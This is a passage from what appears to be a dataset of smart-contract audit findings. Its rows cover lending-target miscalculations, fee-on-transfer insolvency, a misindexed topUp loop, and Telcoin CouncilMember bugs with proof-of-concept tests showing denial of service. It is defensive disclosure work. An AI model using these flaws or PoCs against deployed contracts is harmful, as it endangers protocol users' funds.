rest of code\\n (/* */, uint256 supplyCap) = IPoolDataProvider(POOL_DATA_PROVIDER).getReserveCaps(underlying);\\n // Supply caps are returned as whole token values\\n supplyCap = supplyCap * UNDERLYING_PRECISION;\\n uint256 aTokenSupply = IPoolDataProvider(POOL_DATA_PROVIDER).getATokenTotalSupply(underlying);\\n\\n // If supply cap is zero, that means there is no cap on the pool\\n if (supplyCap == 0) {\\n oracleData.maxExternalDeposit = type(uint256).max;\\n } else if (supplyCap <= aTokenSupply) {\\n oracleData.maxExternalDeposit = 0;\\n } else {\\n // underflow checked as consequence of if / else statement\\n oracleData.maxExternalDeposit = supplyCap - aTokenSupply;\\n }\\n```\\n" +getTargetExternalLendingAmount() when targetUtilization == 0 no check whether enough externalUnderlyingAvailableForWithdraw,medium,"in `getTargetExternalLendingAmount()` When `targetUtilization == 0`, it directly returns `targetAmount=0`. It lacks the judgment of whether there is enough `externalUnderlyingAvailableForWithdraw`. This may cause `_rebalanceCurrency()` to `revert` due to insufficient balance for `withdraw`.\\nwhen `setRebalancingTargets()` , we can setting all the targets to zero to immediately exit money it will call `_rebalanceCurrency() -> _isExternalLendingUnhealthy() -> getTargetExternalLendingAmount()`\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n // Short circuit a zero target\\n if (rebalancingTargetData.targetUtilization == 0) return 0;\\n\\n// rest of code.\\n if (targetAmount < oracleData.currentExternalUnderlyingLend) {\\n uint256 forRedemption = oracleData.currentExternalUnderlyingLend - targetAmount;\\n if (oracleData.externalUnderlyingAvailableForWithdraw < forRedemption) {\\n // increase target amount so that redemptions amount match externalUnderlyingAvailableForWithdraw\\n targetAmount = targetAmount.add(\\n // unchecked - is safe here, overflow is not possible due to above if conditional\\n forRedemption - oracleData.externalUnderlyingAvailableForWithdraw\\n );\\n }\\n }\\n```\\n\\nWhen `targetUtilization==0`, it returns `targetAmount ==0`. It lacks the other judgments of whether the current `externalUnderlyingAvailableForWithdraw` is sufficient. Exceeding `externalUnderlyingAvailableForWithdraw` may cause `_rebalanceCurrency()` to revert.\\nFor example: `currentExternalUnderlyingLend = 100` `externalUnderlyingAvailableForWithdraw = 99` If `targetUtilization` is modified to `0`, then `targetAmount` should be `1`, not `0`. `0` will cause an error due to insufficient available balance for withdrawal.\\nSo, it should still try to withdraw as much deposit as possible first, wait for replenishment, and then withdraw the remaining deposit until the deposit is cleared.","Remove `targetUtilization == 0` directly returning 0.\\nThe subsequent logic of the method can handle `targetUtilization == 0` normally and will not cause an error.\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n // Short circuit a zero target\\n// Remove the line below\\n if (rebalancingTargetData.targetUtilization == 0) return 0;\\n```\\n","A too small `targetAmount` may cause AAVE withdraw to fail, thereby causing the inability to `setRebalancingTargets()` to fail.","```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n // Short circuit a zero target\\n if (rebalancingTargetData.targetUtilization == 0) return 0;\\n\\n// rest of code.\\n if (targetAmount < oracleData.currentExternalUnderlyingLend) {\\n uint256 forRedemption = oracleData.currentExternalUnderlyingLend - targetAmount;\\n if (oracleData.externalUnderlyingAvailableForWithdraw < forRedemption) {\\n // increase target amount so that redemptions amount match externalUnderlyingAvailableForWithdraw\\n targetAmount = targetAmount.add(\\n // unchecked - is safe here, overflow is not possible due to above if conditional\\n forRedemption - oracleData.externalUnderlyingAvailableForWithdraw\\n );\\n }\\n }\\n```\\n" +getTargetExternalLendingAmount() targetAmount may far less than the correct value,medium,"When calculating `ExternalLending.getTargetExternalLendingAmount()`, it restricts `targetAmount` greater than `oracleData.maxExternalDeposit`. However, it does not take into account that `oracleData.maxExternalDeposit` includes the protocol deposit `currentExternalUnderlyingLend` This may result in the returned quantity being far less than the correct quantity.\\nin `getTargetExternalLendingAmount()` It restricts `targetAmount` greater than `oracleData.maxExternalDeposit`.\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n targetAmount = SafeUint256.min(\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n // token precision here for accurate comparison. No underflow possible since targetExternalUnderlyingLend\\n // is floored at zero.\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n );\\n```\\n\\nthis is : `targetAmount = min(targetExternalUnderlyingLend, maxExternalUnderlyingLend, oracleData.maxExternalDeposit)`\\nThe problem is that when calculating `oracleData.maxExternalDeposit`, it does not exclude the existing deposit `currentExternalUnderlyingLend` of the current protocol.\\nFor example: `currentExternalUnderlyingLend = 100` `targetExternalUnderlyingLend = 100` `maxExternalUnderlyingLend = 10000` `oracleData.maxExternalDeposit = 0` (All AAVE deposits include the current deposit currentExternalUnderlyingLend)\\nIf according to the current calculation result: `targetAmount=0`, this will result in needing to withdraw `100`. (currentExternalUnderlyingLend - targetAmount)\\nIn fact, only when the calculation result needs to increase the `deposit` (targetAmount > currentExternalUnderlyingLend), it needs to be restricted by `maxExternalDeposit`.\\nThe correct one should be neither deposit nor withdraw, that is, `targetAmount=currentExternalUnderlyingLend = 100`.","Only when `targetAmount > currentExternalUnderlyingLend` is a deposit needed, it should be considered that it cannot exceed `oracleData.maxExternalDeposit`\\n```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n// Remove the line below\\n targetAmount = SafeUint256.min(\\n// Remove the line below\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n// Remove the line below\\n // token precision here for accurate comparison. No underflow possible since targetExternalUnderlyingLend\\n// Remove the line below\\n // is floored at zero.\\n// Remove the line below\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n// Remove the line below\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n// Remove the line below\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n// Remove the line below\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n// Remove the line below\\n );\\n\\n// Add the line below\\n targetAmount = SafeUint256.min(uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),maxExternalUnderlyingLend);\\n// Add the line below\\n if (targetAmount > oracleData.currentExternalUnderlyingLend) { //when deposit , must check maxExternalDeposit\\n// Add the line below\\n uint256 forDeposit = targetAmount // Remove the line below\\n oracleData.currentExternalUnderlyingLend;\\n// Add the line below\\n if (forDeposit > oracleData.maxExternalDeposit) {\\n// Add the line below\\n targetAmount = targetAmount.sub(\\n// Add the line below\\n forDeposit // Remove the line below\\n oracleData.maxExternalDeposit\\n// Add the line below\\n ); \\n// Add the line below\\n }\\n// Add the line below\\n }\\n```\\n","A too small `targetAmount` will cause the withdrawal of deposits that should not be withdrawn, damaging the interests of the protocol.","```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n targetAmount = SafeUint256.min(\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n // token precision here for accurate comparison. No underflow possible since targetExternalUnderlyingLend\\n // is floored at zero.\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n );\\n```\\n" +`wfCashERC4626`,medium,"The `wfCash` vault is credited less prime cash than the `wfCash` it mints to the depositor when its underlying asset is a fee-on-transfer token. This leads to the vault being insolvent because it has issued more shares than can be redeemed.\\n```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n } else if (isETH || hasTransferFee || getCashBalance() > 0) {\\n```\\n\\n```\\n } else {\\n // In the case of deposits, we use a balance before and after check\\n // to ensure that we record the proper balance change.\\n actualTransferExternal = GenericToken.safeTransferIn(\\n underlying.tokenAddress, account, underlyingExternalDeposit\\n ).toInt();\\n }\\n\\n netPrimeSupplyChange = _postTransferPrimeCashUpdate(\\n account, currencyId, actualTransferExternal, underlying, primeRate\\n );\\n```\\n\\n```\\n // Mints ERC20 tokens for the receiver\\n _mint(receiver, fCashAmount);\\n```\\n\\nIn the case of lending at 0% interest, `fCashAmount` is equal to `depositAmount` but at 1e8 precision.\\nTo simplify the example, let us assume that there are no other depositors. When the sole depositor redeems all their `wfCash` shares at maturity, they will be unable to redeem all their shares because the `wfCash` vault does not hold enough prime cash.","Consider adding the following:\\nA flag in `wfCashERC4626` that signals that the vault's asset is a fee-on-transfer token.\\nIn `wfCashERC4626._previewMint()` and `wfCashERC46262._previewDeposit`, all calculations related to `assets` should account for the transfer fee of the token.","Although the example used to display the vulnerability is for the case of lending at 0% interest, the issue exists for minting any amount of shares.\\nThe `wfCashERC4626` vault will become insolvent and unable to buy back all shares. The larger the total amount deposited, the larger the deficit. The deficit is equal to the transfer fee. Given a total deposit amount of 100M USDT and a transfer fee of 2% (assuming a transfer fee was set and enabled for USDT), 2M USDT will be the deficit.\\nThe last depositors to redeem their shares will be shouldering the loss.","```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n } else if (isETH || hasTransferFee || getCashBalance() > 0) {\\n```\\n" +`ExternalLending`,medium,"When the Treasury rebalances and has to redeem aTokens from AaveV3, it checks that the actual amount withdrawn is greater than or equal to the set `withdrawAmount`. This check will always fail for fee-on-transfer tokens since the `withdrawAmount` does not account for the transfer fee.\\n```\\n address[] memory targets = new address[](UNDERLYING_IS_ETH ? 2 : 1);\\n bytes[] memory callData = new bytes[](UNDERLYING_IS_ETH ? 2 : 1);\\n targets[0] = LENDING_POOL;\\n callData[0] = abi.encodeWithSelector(\\n ILendingPool.withdraw.selector, underlyingToken, withdrawAmount, address(NOTIONAL)\\n );\\n\\n if (UNDERLYING_IS_ETH) {\\n // Aave V3 returns WETH instead of native ETH so we have to unwrap it here\\n targets[1] = address(Deployments.WETH);\\n callData[1] = abi.encodeWithSelector(WETH9.withdraw.selector, withdrawAmount);\\n }\\n\\n data = new RedeemData[](1);\\n // Tokens with less than or equal to 8 decimals sometimes have off by 1 issues when depositing\\n // into Aave V3. Aave returns one unit less than has been deposited. This adjustment is applied\\n // to ensure that this unit of token is credited back to prime cash holders appropriately.\\n uint8 rebasingTokenBalanceAdjustment = UNDERLYING_DECIMALS <= 8 ? 1 : 0;\\n data[0] = RedeemData(\\n targets, callData, withdrawAmount, ASSET_TOKEN, rebasingTokenBalanceAdjustment\\n );\\n```\\n\\nNote that the third field in the `RedeemData` struct is the `expectedUnderlying` field which is set to the `withdrawAmount` and that `withdrawAmount` is a value greater than zero.\\n```\\n for (uint256 j; j < data.targets.length; j++) {\\n GenericToken.executeLowLevelCall(data.targets[j], 0, data.callData[j]);\\n }\\n\\n // Ensure that we get sufficient underlying on every redemption\\n uint256 newUnderlyingBalance = TokenHandler.balanceOf(underlyingToken, address(this));\\n uint256 underlyingBalanceChange = newUnderlyingBalance.sub(oldUnderlyingBalance);\\n // If the call is not the final redemption, then expectedUnderlying should\\n // be set to zero.\\n require(data.expectedUnderlying <= underlyingBalanceChange);\\n```\\n\\n```\\nredeemAmounts[0] = currentAmount - targetAmount;\\n```\\n\\nIt does not account for transfer fees. In effect, that check will always revert when the underlying being withdrawn is a fee-on-transfer token.","When computing for the `withdrawAmount / data.expectedUnderlying`, it should account for the transfer fees. The pseudocode for the computation may look like so:\\n```\\nwithdrawAmount = currentAmount - targetAmount\\nif (underlyingToken.hasTransferFee) {\\n withdrawAmount = withdrawAmount / (100% - underlyingToken.transferFeePercent)\\n}\\n```\\n","```\\n uint256 withdrawAmount = uint256(netTransferExternal.neg());\\n ExternalLending.redeemMoneyMarketIfRequired(currencyId, underlying, withdrawAmount);\\n```\\n\\nThis means that these tokens can only be deposited into AaveV3 but can never redeemed. This can lead to insolvency of the protocol.","```\\n address[] memory targets = new address[](UNDERLYING_IS_ETH ? 2 : 1);\\n bytes[] memory callData = new bytes[](UNDERLYING_IS_ETH ? 2 : 1);\\n targets[0] = LENDING_POOL;\\n callData[0] = abi.encodeWithSelector(\\n ILendingPool.withdraw.selector, underlyingToken, withdrawAmount, address(NOTIONAL)\\n );\\n\\n if (UNDERLYING_IS_ETH) {\\n // Aave V3 returns WETH instead of native ETH so we have to unwrap it here\\n targets[1] = address(Deployments.WETH);\\n callData[1] = abi.encodeWithSelector(WETH9.withdraw.selector, withdrawAmount);\\n }\\n\\n data = new RedeemData[](1);\\n // Tokens with less than or equal to 8 decimals sometimes have off by 1 issues when depositing\\n // into Aave V3. Aave returns one unit less than has been deposited. This adjustment is applied\\n // to ensure that this unit of token is credited back to prime cash holders appropriately.\\n uint8 rebasingTokenBalanceAdjustment = UNDERLYING_DECIMALS <= 8 ? 1 : 0;\\n data[0] = RedeemData(\\n targets, callData, withdrawAmount, ASSET_TOKEN, rebasingTokenBalanceAdjustment\\n );\\n```\\n" +`StakingRewardsManager::topUp(...)` Misallocates Funds to `StakingRewards` Contracts,high,"The `StakingRewardsManager::topUp(...)` contract exhibits an issue where the specified `StakingRewards` contracts are not topped up at the correct indices, resulting in an incorrect distribution to different contracts.\\nThe `StakingRewardsManager::topUp(...)` function is designed to top up multiple `StakingRewards` contracts simultaneously by taking the indices of the contract's addresses in the `StakingRewardsManager::stakingContracts` array. However, the flaw lies in the distribution process:\\n```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i++) {\\n // get staking contract and config\\n StakingRewards staking = stakingContracts[i];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n\\nGitHub: [254-278]\\nThe rewards are not appropriately distributed to the `StakingRewards` contracts at the specified indices. Instead, they are transferred to the contracts at the loop indices. For instance, if intending to top up contracts at indices `[1, 2]`, the actual top-up occurs at indices `[0, 1]`.","It is recommended to do the following changes:\\n```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i// Add the line below\\n// Add the line below\\n) {\\n // get staking contract and config\\n// Remove the line below\\n StakingRewards staking = stakingContracts[i];\\n// Add the line below\\n StakingRewards staking = stakingContracts[indices[i]];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n","The consequence of this vulnerability is that rewards will be distributed to the incorrect staking contract, leading to potential misallocation and unintended outcomes","```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i++) {\\n // get staking contract and config\\n StakingRewards staking = stakingContracts[i];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n" +Wrong parameter when retrieving causes a complete DoS of the protocol,high,"A wrong parameter in the `_retrieve()` prevents the protocol from properly interacting with Sablier, causing a Denial of Service in all functions calling `_retrieve()`.\\nThe `CouncilMember` contract is designed to interact with a Sablier stream. As time passes, the Sablier stream will unlock more TELCOIN tokens which will be available to be retrieved from `CouncilMember`.\\nThe `_retrieve()` internal function will be used in order to fetch the rewards from the stream and distribute them among the Council Member NFT holders (snippet reduced for simplicity):\\n```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, \\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n\\nThe most important part in `_retrieve()` regarding the vulnerability that we'll dive into is the `_stream.execute()` interaction and the params it receives. In order to understand such interaction, we first need understand the importance of the `_stream` and the `_target` variables.\\nSablier allows developers to integrate Sablier via Periphery contracts, which prevents devs from dealing with the complexity of directly integrating Sablier's Core contracts. Telcoin developers have decided to use these periphery contracts. Concretely, the following contracts have been used:\\nNOTE: It is important to understand that the actual lockup linear stream will be deployed as well. The difference is that the Telcoin protocol will not interact with that contract directly. Instead, the PRBProxy and proxy target contracts will be leveraged to perform such interactions.\\nKnowing this, we can now move on to explaining Telcoin's approach to withdrawing the available tokens from the stream. As seen in the code snippet above, the `_retrieve()` function will perform two steps to actually perform a withdraw from the stream:\\nIt will first call the _stream's `execute()` function (remember `_stream` is a PRBProxy). This function receives a `target` and some `data` as parameter, and performs a delegatecall aiming at the target:\\nIn the `_retrieve()` function, the target where the call will be forwarded to is the `_target` parameter, which is a ProxyTarget contract. Concretely, the delegatecall function that will be triggered in the ProxyTarget will be withdrawMax():\\nAs we can see, the `withdrawMax()` function has as parameters the `lockup` stream contract `to` withdraw from, the `streamId` and the address `to` which will receive the available funds from the stream. The vulnerability lies in the parameters passed when calling the `withdrawMax()` function in `_retrieve()`. As we can see, the first encoded parameter in the `encodeWithSelector()` call after the selector is the _target:\\n```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, // <------- This is incorrect\\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n\\nThis means that the proxy target's `withdrawMax()` function will be triggered with the `_target` contract as the `lockup` parameter, which is incorrect. This will make all calls eventually execute `withdrawMax()` on the PRBProxy contract, always reverting.\\nThe parameter needed to perform the `withdrawMax()` call correctly is the actual Sablier lockup contract, which is currently not stored in the `CouncilMember` contract.\\nThe following diagram also summarizes the current wrong interactions for clarity:","In order to fix the vulnerability, the proper address needs to be passed when calling `withdrawMax()`.\\nNote that the actual stream address is currently NOT stored in `CouncilMember.sol`, so it will need to be stored (my example shows a new `actualStream` variable)\\n```\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n// Remove the line below\\n _target, \\n// Add the line below\\n actualStream\\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n","High. ALL withdrawals from the Sablier stream will revert, effectively causing a DoS in the _retrieve() function. Because the _retrieve() function is called in all the main protocol functions, this vulnerability essentially prevents the protocol from ever functioning correctly.\\nProof of Concept\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport {Test, console2} from ""forge-std/Test.sol"";\\nimport {SablierV2Comptroller} from ""@sablier/v2-core/src/SablierV2Comptroller.sol"";\\nimport {SablierV2NFTDescriptor} from ""@sablier/v2-core/src/SablierV2NFTDescriptor.sol"";\\nimport {SablierV2LockupLinear} from ""@sablier/v2-core/src/SablierV2LockupLinear.sol"";\\nimport {ISablierV2Comptroller} from ""@sablier/v2-core/src/interfaces/ISablierV2Comptroller.sol"";\\nimport {ISablierV2NFTDescriptor} from ""@sablier/v2-core/src/interfaces/ISablierV2NFTDescriptor.sol"";\\nimport {ISablierV2LockupLinear} from ""@sablier/v2-core/src/interfaces/ISablierV2LockupLinear.sol"";\\n\\nimport {CouncilMember, IPRBProxy} from ""../src/core/CouncilMember.sol"";\\nimport {TestTelcoin} from ""./mock/TestTelcoin.sol"";\\nimport {MockProxyTarget} from ""./mock/MockProxyTarget.sol"";\\nimport {PRBProxy} from ""./mock/MockPRBProxy.sol"";\\nimport {PRBProxyRegistry} from ""./mock/MockPRBProxyRegistry.sol"";\\n\\nimport {UD60x18} from ""@prb/math/src/UD60x18.sol"";\\nimport {LockupLinear, Broker, IERC20} from ""@sablier/v2-core/src/types/DataTypes.sol"";\\nimport {IERC20 as IERC20OZ} from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\n\\ncontract PocTest is Test {\\n\\n ////////////////////////////////////////////////////////////////\\n // CONSTANTS //\\n ////////////////////////////////////////////////////////////////\\n\\n bytes32 public constant GOVERNANCE_COUNCIL_ROLE =\\n keccak256(""GOVERNANCE_COUNCIL_ROLE"");\\n bytes32 public constant SUPPORT_ROLE = keccak256(""SUPPORT_ROLE"");\\n\\n ////////////////////////////////////////////////////////////////\\n // STORAGE //\\n ////////////////////////////////////////////////////////////////\\n\\n /// @notice Poc Users\\n address public sablierAdmin;\\n address public user;\\n\\n /// @notice Sablier contracts\\n SablierV2Comptroller public comptroller;\\n SablierV2NFTDescriptor public nftDescriptor;\\n SablierV2LockupLinear public lockupLinear;\\n\\n /// @notice Telcoin contracts\\n PRBProxyRegistry public proxyRegistry;\\n PRBProxy public stream;\\n MockProxyTarget public target;\\n CouncilMember public councilMember;\\n TestTelcoin public telcoin;\\n\\n function setUp() public {\\n // Setup users\\n _setupUsers();\\n\\n // Deploy token\\n telcoin = new TestTelcoin(address(this));\\n\\n // Deploy Sablier \\n _deploySablier();\\n\\n // Deploy council member\\n councilMember = new CouncilMember();\\n\\n // Setup stream\\n _setupStream();\\n\\n // Setup the council member\\n _setupCouncilMember();\\n }\\n\\n function testPoc() public {\\n // Step 1: Mint council NFT to user\\n councilMember.mint(user);\\n assertEq(councilMember.balanceOf(user), 1);\\n\\n // Step 2: Forward time 1 days\\n vm.warp(block.timestamp + 1 days);\\n \\n // Step 3: All functions calling _retrieve() (mint(), burn(), removeFromOffice()) will fail\\n vm.expectRevert(abi.encodeWithSignature(""PRBProxy_ExecutionReverted()"")); \\n councilMember.mint(user);\\n }\\n\\n function _setupUsers() internal {\\n sablierAdmin = makeAddr(""sablierAdmin"");\\n user = makeAddr(""user"");\\n }\\n\\n function _deploySablier() internal {\\n // Deploy protocol\\n comptroller = new SablierV2Comptroller(sablierAdmin);\\n nftDescriptor = new SablierV2NFTDescriptor();\\n lockupLinear = new SablierV2LockupLinear(\\n sablierAdmin,\\n ISablierV2Comptroller(address(comptroller)),\\n ISablierV2NFTDescriptor(address(nftDescriptor))\\n );\\n }\\n\\n function _setupStream() internal {\\n\\n // Deploy proxies\\n proxyRegistry = new PRBProxyRegistry();\\n stream = PRBProxy(payable(address(proxyRegistry.deploy())));\\n target = new MockProxyTarget();\\n\\n // Setup stream\\n LockupLinear.Durations memory durations = LockupLinear.Durations({\\n cliff: 0,\\n total: 1 weeks\\n });\\n\\n UD60x18 fee = UD60x18.wrap(0);\\n\\n Broker memory broker = Broker({account: address(0), fee: fee});\\n LockupLinear.CreateWithDurations memory params = LockupLinear\\n .CreateWithDurations({\\n sender: address(this),\\n recipient: address(stream),\\n totalAmount: 100e18,\\n asset: IERC20(address(telcoin)),\\n cancelable: false,\\n transferable: false,\\n durations: durations,\\n broker: broker\\n });\\n\\n bytes memory data = abi.encodeWithSelector(target.createWithDurations.selector, address(lockupLinear), params, """");\\n\\n // Create the stream through the PRBProxy\\n telcoin.approve(address(stream), type(uint256).max);\\n bytes memory response = stream.execute(address(target), data);\\n assertEq(lockupLinear.ownerOf(1), address(stream));\\n }\\n\\n function _setupCouncilMember() internal {\\n // Initialize\\n councilMember.initialize(\\n IERC20OZ(address(telcoin)),\\n ""Test Council"",\\n ""TC"",\\n IPRBProxy(address(stream)), // stream_\\n address(target), // target_\\n 1, // id_\\n address(lockupLinear)\\n );\\n\\n // Grant roles\\n councilMember.grantRole(GOVERNANCE_COUNCIL_ROLE, address(this));\\n councilMember.grantRole(SUPPORT_ROLE, address(this));\\n }\\n \\n}\\n```\\n","```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, \\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n" +CouncilMember:burn renders the contract inoperable after the first execution,high,"The CouncilMember contract suffers from a critical vulnerability that misaligns the balances array after a successful burn, rendering the contract inoperable.\\nThe root cause of the vulnerability is that the `burn` function incorrectly manages the `balances` array, shortening it by one each time an ERC721 token is burned while the latest minted NFT still withholds its unique `tokenId` which maps to the previous value of `balances.length`.\\n```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function burn(\\n // rest of code\\n balances.pop(); // <= FOUND: balances.length decreases, while latest minted nft withold its unique tokenId\\n _burn(tokenId);\\n }\\n```\\n\\nThis misalignment between existing `tokenIds` and the `balances` array results in several critical impacts:\\nHolders with `tokenId` greater than the length of balances cannot claim.\\nSubsequent burns of `tokenId` greater than balances length will revert.\\nSubsequent mint operations will revert due to `tokenId` collision. As `totalSupply` now collides with the existing `tokenId`.\\n```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function mint(\\n // rest of code\\n balances.push(0);\\n _mint(newMember, totalSupply());// <= FOUND\\n }\\n```\\n\\nThis mismanagement creates a cascading effect, collectively rendering the contract inoperable. Following POC will demonstrate the issue more clearly in codes.\\nPOC\\nRun `git apply` on the following patch then run `npx hardhat test` to run the POC.\\n```\\ndiff --git a/telcoin-audit/test/sablier/CouncilMember.test.ts b/telcoin-audit/test/sablier/CouncilMember.test.ts\\nindex 675b89d..ab96b08 100644\\n--- a/telcoin-audit/test/sablier/CouncilMember.test.ts\\n+++ b/telcoin-audit/test/sablier/CouncilMember.test.ts\\n@@ -1,13 +1,14 @@\\n import { expect } from ""chai"";\\n import { ethers } from ""hardhat"";\\n import { SignerWithAddress } from ""@nomicfoundation/hardhat-ethers/signers"";\\n-import { CouncilMember, TestTelcoin, TestStream } from ""../../typechain-types"";\\n+import { CouncilMember, TestTelcoin, TestStream, ERC721Upgradeable__factory } from ""../../typechain-types"";\\n \\n describe(""CouncilMember"", () => {\\n let admin: SignerWithAddress;\\n let support: SignerWithAddress;\\n let member: SignerWithAddress;\\n let holder: SignerWithAddress;\\n+ let lastCouncilMember: SignerWithAddress;\\n let councilMember: CouncilMember;\\n let telcoin: TestTelcoin;\\n let stream: TestStream;\\n@@ -18,7 +19,7 @@ describe(""CouncilMember"", () => {\\n let supportRole: string = ethers.keccak256(ethers.toUtf8Bytes(""SUPPORT_ROLE""));\\n \\n beforeEach(async () => {\\n- [admin, support, member, holder, target] = await ethers.getSigners();\\n+ [admin, support, member, holder, target, lastCouncilMember] = await ethers.getSigners();\\n \\n const TestTelcoinFactory = await ethers.getContractFactory(""TestTelcoin"", admin);\\n telcoin = await TestTelcoinFactory.deploy(admin.address);\\n@@ -182,6 +183,22 @@ describe(""CouncilMember"", () => {\\n it(""the correct removal is made"", async () => {\\n await expect(councilMember.burn(1, support.address)).emit(councilMember, ""Transfer"");\\n });\\n+ it.only(""inoperable contract after burn"", async () => {\\n+ await expect(councilMember.mint(lastCouncilMember.address)).to.not.reverted;\\n+\\n+ // This 1st burn will cause contract inoperable due to tokenId & balances 